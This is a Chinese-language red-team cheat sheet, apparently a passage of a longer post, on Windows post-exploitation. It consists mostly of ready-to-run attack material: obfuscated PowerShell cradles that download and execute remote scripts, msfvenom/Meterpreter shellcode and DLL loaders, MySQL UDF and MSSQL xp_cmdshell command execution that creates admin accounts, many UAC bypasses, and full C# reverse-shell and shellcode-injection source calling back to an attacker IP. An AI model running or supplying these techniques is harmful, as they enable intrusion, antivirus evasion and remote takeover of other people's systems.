powershell.exe "$c1='powershell -c IEX';$c2='(New-Object Net.WebClient).Downlo';$c3='adString("http://192.168.197.192/a.ps1")';echo ($c1,$c2,$c3)"先將命令拆分為字符串,然后進行拼接��。echo修改為IEX執行����。powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)
replace替換函數
powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.replace('123','adString');IEX ($c1+$c2)"
HTTP字符拼接繞過
也可以對http字符進行繞過,同樣可以bypasspowershell "$a='IEX((new-object net.webclient).downloadstring("ht';$b='tp://192.168.197.192/a.ps1"))';IEX ($a+$b)"
圖片免殺
通過圖片免殺執行powershell的腳本Invoke-PSImage.ps1,主要把payload分散存到圖片的像素中,最后到遠端執行時,再重新遍歷重組像素中的payload執行��。https://github.com/peewpw/Invoke-PSImage1900*1200的圖片x.jpg��。C:\>powershellPS C:\> Import-Module .\Invoke-PSImage.ps1PS C:\> Invoke-PSImage -script .\a.ps1 -Image .\x.jpg -Out .\reverse_shell.png -Weba.ps1是msf木馬,-Out 生成reverse_shell.png圖片,-Web 輸出從web讀取的命令����。將reverse_shell.png移動至web目錄,替換url地址��。在powershell下執行即可�。
加載shellcode
msfvenom生成腳本木馬#msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.72.164 LPORT=4444 -f powershell -o /var/www/html/test 在windows靶機上運行一下命令PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")PS >IEX(New-Object Net.WebClient).DownloadString("http://192.168.72.164/test")Invoke-Shellcode -Shellcode $buf -Force 運行木馬使用Invoke-Shellcode.ps1腳本執行shellcode即可反彈meterpreter shell
加載dll
使用msfvenom 生成dll木馬腳本>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.164 lport=4444 -f dll -o /var/www/html/test.dll 將生成的dll上傳到目標的C盤��。在靶機上執行以下命令PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden 創建新的進程啟動記事本,并設置為隱藏Invoke-DllInjection -ProcessID xxx -Dll c:\test.dll 使用notepad的PID Msf#use exploit/multi/handler#set payload windows/x64/meterpreter/reverse_tcp#run
Windows安全標識符(SID)
| 相對標識符 | 說明 |
|---|
| 500 | 管理員 |
| 501 | 來賓 |
| 502 | 密鑰分發中心服務的服務賬戶 |
| 512 | 域管理員 |
| 513 | 域用戶 |
| 514 | 域來賓 |
| 515 | 域計算機 |
| 516 | 域控制器 |
| 544 | 內置管理員 |
| 519 | 企業管理員 |
提權
Impacket工具包
https://github.com/maaaaz/impacket-examples-windowshttps://github.com/SecureAuthCorp/impacket#git clone https://github.com/CoreSecurity/impacket.git#cd impacket/#python setup.py install
Windows-exploit-suggester
#pip install xlrd --upgrade#./windows-exploit-suggester.py --update#./windows-exploit-suggester.py --database 20xx-xx-xx-mssb.xlsx --systeminfo systeminfo.txt
Wesng
https://github.com/bitsadmin/wesng>systeminfo >1.txt>python wes.py 1.txt
Searchsploit
使用方法>searchsploit 軟件 版本查找常見補丁https://bugs.hacking8.com/tiquan/http://get-av.se7ensec.cn/index.phphttps://patchchecker.com/checkprivs/wmic查詢補丁wmic qfe list full|findstr /i hotfixsysteminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txtMS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)MS15-097 [KB3089656] [remote code execution] (win8.1/2012)MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)MS14-070 [KB2989935] [Kernel Driver] (2003)MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)MS14-002 [KB2914368] [NDProxy] (2003/XP)MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)MS11-080 [KB2592799] [AFD.sys] (2003/XP)MS11-062 [KB2566454] [NDISTAPI] (2003/XP)MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)MS10-092 [KB2305420] [Task Scheduler] (2008/7)MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)MS10-012 [KB971468] [SMB Client Trans2 stack overflow] (Windows 7/2008R2)MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)MS08-068 [KB957097] [Remote Code Execution] (2000/XP)MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)MS08-066 [] [] (Windows 2000/XP/Server 2003)MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
激活guest
>net user guest /active:yes
MYSQL udf
Udf: sqlmap-master\udf\mysql\windows\>python sqlmap/extra/cloak/cloak.py lib_mysqludf_sys.dll _Mysql>5.1 udf.dll放置在lib\pluginMysql<5.1 udf.dll放置在c:\windows\system32#show variables like '%compile%'; 查看系統版本#select @@plugin_dir 查看插件目錄放入udf#select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";或將udf十六進制編碼后寫入#select hex(load_file('udf_sys_64.dll')) into dumpfile '/tmp/udf.hex';#select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000… into dump file "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";或將udf base64編碼后寫入(MySQL 5.6.1和MariaDB 10.0.5)#select to_base64(load_file('/usr/udf.dll')) into dumpfile '/tmp/udf.b64';#select from_base64(“xxxxx”) into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";或創建表拼接十六進制編碼#create table temp(data longblob);#insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d);#update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b3);#select data from temp into dump file "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";或#insert into temp(data) values(hex(load_file('D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll')));#select unhex(cmd) FROM mysql.temp INTO DUMPFILE 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll ';或使用快速導入數據#load data infile '\\\\192.168.0.19\\network\\udf.hex'#into table temp fields terminated by '@OsandaMalith' lines terminated by '@OsandaMalith' (data);#select unhex(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll';創建函數#create function cmdshell returns string soname 'udf.dll';#create function sys_exec returns int soname 'udf.dll';執行命令#select cmdshell('whoami');#select sys_exec(''whoami'');刪除函數#drop function cmdshell;#drop function sys_exec;
MYSQL Linux Root
https://0xdeadbeef.info/exploits/raptor_udf2.c$ gcc -g -c raptor_udf2.c$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc$ mysql -u root -pmysql> use mysql;mysql> create table foo(line blob);mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';mysql> create function do_system returns integer soname 'raptor_udf2.so';mysql> select * from mysql.func;
| name | ret | dl | type |
|---|
| do_system | 2 | raptor_udf2.so | function |
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');mysql> \! shsh-2.05b$ cat /tmp/outuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
MSSQL
開啟xp_cmdshell
xp_cmdshell
#exec sp_configure 'show advanced options', 1;reconfigure;#exec sp_configure 'xp_cmdshell',1;reconfigure;#exec master.dbo.xp_cmdshell 'ipconfig'
xp_regwrite
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'
xp_dirtree
execute master..xp_dirtree 'c:' //列出所有c:\文件和目錄,子目錄execute master..xp_dirtree 'c:',1 //只列c:\文件夾execute master..xp_dirtree 'c:',1,1 //列c:\文件夾加文件
sp_oacreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE;執行命令declare @shell intexec sp_oacreate 'wscript.shell',@shell outputexec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add'declare @shell intexec sp_oacreate 'wscript.shell',@shell outputexec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123/add'刪除文件declare @result intdeclare @fso_token intexec sp_oacreate 'scripting.filesystemobject', @fso_token outexec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'exec sp_oadestroy @fso_token復制文件declare @o intexec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'移動文件declare @o intexec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\2.txt'
沙盒執行
開啟沙盒:>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1執行:>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
WarSQLKit(后門)
http://eyupcelik.com.tr/guvenlik/493-mssql-fileless-rootkit-warsqlkit
MSF
發現補丁#use post/windows/gather/enum_patches列舉可用EXP#use post/multi/recon/local_exploit_suggester
Bypass UAC
MSF
>use exploit/windows/local/bypassuac>use exploit/windows/local/bypassuac_injection>use exploit/windows/local/bypassuac_vbs>use exploit/windows/local/bypassuac_fodhelper>use exploit/windows/local/bypassuac_eventvwr>use exploit/windows/local/bypassuac_comhijack
DccwBypassUAC
Use on win10&win8
K8uac
>k8uac.exe xx.exe>k8uac.exe "command"
CMSTP
設置UAC和Applocker規則
MSF生成惡意DLL傳入靶機>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/cm.dll
DLL同目錄下建立run.inf,RegisterOCXSection指定dll位置,也可以指定遠程webdav如:\\192.168.0.107\webdav\cm.dll[version]Signature=$chicago$AdvancedINF=2.5[DefaultInstall_SingleUser]RegisterOCXs=RegisterOCXSection[RegisterOCXSection]C:\Users\y.SUB2K8\Desktop\cm.dll[Strings]AppAct = "SOFTWARE\Microsoft\Connection Manager"ServiceName="cmstp"ShortSvcName="cmstp"執行命令可繞過UAC和Applocker上線>cmstp /s run.inf
Uacme
包括DLL劫持,COM劫持等50多種bypass方法https://github.com/hfiref0x/UACME
使用visual studio編譯Visual Studio 2013v120;Visual Studio 2015v140;Visual Studio 2017v141;Visual Studio 2019v142����。目前共59種bypassuac方式執行方法是>akagi.exe 1>akagi.exe 1 c:\windows\system32\cmd.exe>akagi.exe 1 "net user 1 1 /add"注意:方式5,9會對目標安全性產生影響,謹慎使用,5需重啟方式6從win8開始在x64上不可用方式11,54只支持x32方式13,19,30,50只支持x64方式14需要進程注入,x64要使用x64的工具
Bypass-UAC
https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC>Bypass-UAC -Method UacMethodSysprep
Method:UacMethodSysprepucmDismMethodUacMethodMMC2UacMethodTcmsetupUacMethodNetOle32
DLL hijack
程序運行,調用DLL的流程1.程序所在目錄2.系統目錄即 SYSTEM32 目錄3.16位系統目錄即 SYSTEM 目錄4.Windows目錄5.加載 DLL 時所在的當前目錄6.PATH環境變量中列出的目錄使用https://docs.microsoft.com/zh-cn/sysinternals/downloads/sigcheck檢查一個程序的是否以高權限執行>sigcheck.exe -m c:\1.exe查看autoElevate是否為true
使用process monitor查看對應程序執行時調用的DLL情況,查找DLL不在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs列表中,并且所在文件夾當前用戶可讀寫,接下來生成惡意dll備份原DLL替換,再運行此程序即可劫持成功���。
SilentCleanup
>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM ">schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Sdclt
win10
1
>reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f 獲得管理員權限>sdclt 彈出cmd>reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f 清除痕跡
2
https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1>Invoke-SDCLTBypass -Command "c:\windows\system32\cmd.exe /c C:\Windows\regedit.exe">sdclt.exe /KickOffElev
Makecab&Wusa
復制文件出錯時
>makecab PsExec64.exe C:\Users\y.ZONE\Desktop\ps.cab>wusa C:\Users\y.ZONE\Desktop\ps.cab /extract:C:\Windows\system32\
CLR BypassUAC
Tested on win10 x64生成dll傳入受控機temp目錄,以下保存為1.bat執行��。REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /fREG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /fREG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /fREG ADD "HKCU\Environment" /v "COR_PROFILER_PATH" /t REG_SZ /d "C:\Temp\test.dll" /f受控機執行gpedit.msc或eventvwr等高權限.net程序時可劫持成功�。
執行后
eventvwr劫持注冊表
打開ProcessMonitor,啟動eventvwr,ctrl+T打開進程樹,選擇進程轉到事件
右鍵選擇包括eventvwr.exe
只選擇顯示注冊表活動
添加一條過濾器,顯示not found文件
找到相應的注冊表位置
值修改為
MSF監聽,再次打開eventvwr
Web Delivery
>use exploit/multi/script/web_delivery>set target 3>set payload windows/x64/meterpreter/reverse_tcp>exploit>use auxiliary/server/regsvr32_command_delivery_server>set cmd ipconfig>use exploit/windows/misc/regsvr32_applocker_bypass_server
Invoke-PsUACme
method="sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc">Invoke-PsUACme -method oobe -Payload "c:\user\a\desktop\x.exe"需指定絕對路徑>Invoke-PsUACme -method oobe -Payload "powershell -w hidden -e xxxxxx">Invoke-PsUACme -Payload "powershell -noexit IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"MSFVENOM生成psh-reflection格式腳本>Invoke-PsUACme –Payload "powershell c:\1.ps1"
Whitelist(白名單)
GreatSCT
>git clone https://github.com/GreatSCT/GreatSCT.git>cd GreatSCT/setup&./setup.sh>use Bypass>list>use regasm/meterpreter/rev_tcp.py>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
JSRat
>JSRat.py -i 192.168.1.107 -p 4444
Odbcconf.exe
>odbcconf.exe /a {regsvr C:\shell.dll} 可以是任意后綴
Msiexec.exe
>msiexec /y c:\user\admin\desktop\1.dll>msiexec /q /i http://192.168.0.107/dll.dll
InstallUtil.exe
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe /unsafe C:\Users\y\Desktop\1.csusing System;using System.Net;using System.Linq;using System.Net.Sockets;using System.Runtime.InteropServices;using System.Threading;using System.Configuration.Install;using System.Windows.Forms;public class GQLBigHgUniLuVx { public static void Main() { while(true) {{ MessageBox.Show("doge"); Console.ReadLine();}} }} [System.ComponentModel.RunInstaller(true)]public class esxWUYUTWShqW : System.Configuration.Install.Installer{ public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu) { jkmhGrfzsKQeCG.LCIUtRN(); }}public class jkmhGrfzsKQeCG{ [DllImport("kernel")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);static byte[] ErlgHH(string ZwznjBJY,int KsMEeo) {IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }catch { return null;}byte[] UmquAHRnhhpuE = new byte[4];XXxIoIXNCle.Receive(UmquAHRnhhpuE,4,0);int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE,0);byte[] qaYyFq = new byte[kFVRSNnpj +5];int SRCDELibA =0;while(SRCDELibA < kFVRSNnpj){ SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA +5,(kFVRSNnpj - SRCDELibA)<4096 ? (kFVRSNnpj - SRCDELibA) : 4096,0);}byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);Array.Copy(TvvzOgPLqwcFFv,0, qaYyFq,1,4); qaYyFq[0]=0xBF;return qaYyFq;}static void cmMtjerv(byte[] HEHUjJhkrNS) {if(HEHUjJhkrNS !=null) {UInt32 WcpKfU = VirtualAlloc(0,(UInt32)HEHUjJhkrNS.Length,0x1000,0x40);Marshal.Copy(HEHUjJhkrNS,0,(IntPtr)(WcpKfU), HEHUjJhkrNS.Length);IntPtr UhxtIFnlOQatrk = IntPtr.Zero;UInt32 wdjYKFDCCf =0;IntPtr XVYcQxpp = IntPtr.Zero;UhxtIFnlOQatrk = CreateThread(0,0, WcpKfU, XVYcQxpp,0, ref wdjYKFDCCf);WaitForSingleObject(UhxtIFnlOQatrk,0xFFFFFFFF); }}public static void LCIUtRN() {byte[] IBtCWU =null; IBtCWU = ErlgHH("192.168.0.107",12138);cmMtjerv(IBtCWU);} }生成exe后執行>C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exeMSF監聽12138端口
Compiler.exe
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.tcp
1.xml
<?xml version="1.0" encoding="utf-8"?><CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"><files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><d2p1:string>1.tcp</d2p1:string></files><parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"><assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName><embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable><generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory><includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation><linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName><tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors><warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel><win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/><d2p1:checkTypes>false</d2p1:checkTypes><d2p1:compileWithNoCode>false</d2p1:compileWithNoCode><d2p1:compilerOptions i:nil="true" /><d2p1:generateCCU>false</d2p1:generateCCU><d2p1:languageToUse>CSharp</d2p1:languageToUse><d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" /><d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" /><d2p1:mtInfo i:nil="true"/><d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" /></parameters></CompilerInput>
1.tcp
using System;using System.Text;using System.IO;using System.Diagnostics;using System.ComponentModel;using System.Net;using System.Net.Sockets;using System.Workflow.Activities;public class Program : SequentialWorkflowActivity{static StreamWriter streamWriter;public Program(){using(TcpClient client = new TcpClient("192.168.0.107", 12138)){using(Stream stream = client.GetStream()){using(StreamReader rdr = new StreamReader(stream)){streamWriter = new StreamWriter(stream);StringBuilder strInput = new StringBuilder();Process p = new Process();p.StartInfo.FileName = "cmd.exe";p.StartInfo.CreateNoWindow = true;p.StartInfo.UseShellExecute = false;p.StartInfo.RedirectStandardOutput = true;p.StartInfo.RedirectStandardInput = true;p.StartInfo.RedirectStandardError = true;p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);p.Start();p.BeginOutputReadLine();while(true){strInput.Append(rdr.ReadLine());p.StandardInput.WriteLine(strInput);strInput.Remove(0, strInput.Length);}}}}}private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine){StringBuilder strOutput = new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception err) { }}}}
>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.cs
using System.Workflow.Activities;using System.Net;using System.Net.Sockets;using System.Runtime.InteropServices;using System.Threading;class yrDaTlg : SequentialWorkflowActivity {[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 rCfMkmxRSAakg,UInt32 qjRsrljIMB, UInt32 peXiTuE, UInt32 AkpADfOOAVBZ);[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr DStOGXQMMkP, uint CzzIpcuQppQSTBJ, uint JCFImGhkRqtwANx, out uint exgVpSg);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 eisuQbXKYbAvA, UInt32 WQATOZaFz, IntPtr AEGJQOn,IntPtr SYcfyeeSgPl, UInt32 ZSheqBwKtDf, ref UInt32 SZtdSB);[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr KqJNFlHpsKOV, UInt32 EYBOArlCLAM);public yrDaTlg() {byte[] QWKpWKhcs ={SHELLCODE};IntPtr AmnGaO = VirtualAlloc(0, (UInt32)QWKpWKhcs.Length, 0x3000, 0x04);Marshal.Copy(QWKpWKhcs, 0, (IntPtr)(AmnGaO), QWKpWKhcs.Length);IntPtr oXmoNUYvivZlXj = IntPtr.Zero; UInt32 XVXTOi = 0; IntPtr pAeCTfwBS = IntPtr.Zero;uint BnhanUiUJaetgy;bool iSdNUQK = VirtualProtect(AmnGaO, (uint)0x1000, (uint)0x20, out BnhanUiUJaetgy);oXmoNUYvivZlXj = CreateThread(0, 0, AmnGaO, pAeCTfwBS, 0, ref XVXTOi);WaitForSingleObject(oXmoNUYvivZlXj, 0xFFFFFFFF);}}
Csc
>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out: C:\Users\y\Desktop\shell.exe /platform:x64 /unsafe C:\Users\y\Desktop\shell.cs>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe
using System;using System.Net;using System.Diagnostics;using System.Reflection;using System.Configuration.Install;using System.Runtime.InteropServices;public class Program{public static void Main(){}}[System.ComponentModel.RunInstaller(true)]public class Sample : System.Configuration.Install.Installer{public override void Uninstall(System.Collections.IDictionary savedState){Shellcode.exec();}}public class Shellcode{public static void exec(){byte[] shellcode = new byte[510] {SHELLCODE};UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);}private static UInt32 MEM_COMMIT = 0x1000;private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;[DllImport("kernel32")]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);[DllImport("kernel32")]private static extern bool VirtualFree(IntPtr lpAddress,UInt32 dwSize, UInt32 dwFreeType);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 lpThreadAttributes,UInt32 dwStackSize,UInt32 lpStartAddress,IntPtr param,UInt32 dwCreationFlags,ref UInt32 lpThreadId);[DllImport("kernel32")]private static extern bool CloseHandle(IntPtr handle);[DllImport("kernel32")]private static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);[DllImport("kernel32")]private static extern IntPtr GetModuleHandle(string moduleName);[DllImport("kernel32")]private static extern UInt32 GetProcAddress(IntPtr hModule,string procName);[DllImport("kernel32")]private static extern UInt32 LoadLibrary(string lpFileName);[DllImport("kernel32")]private static extern UInt32 GetLastError();}
Regasm
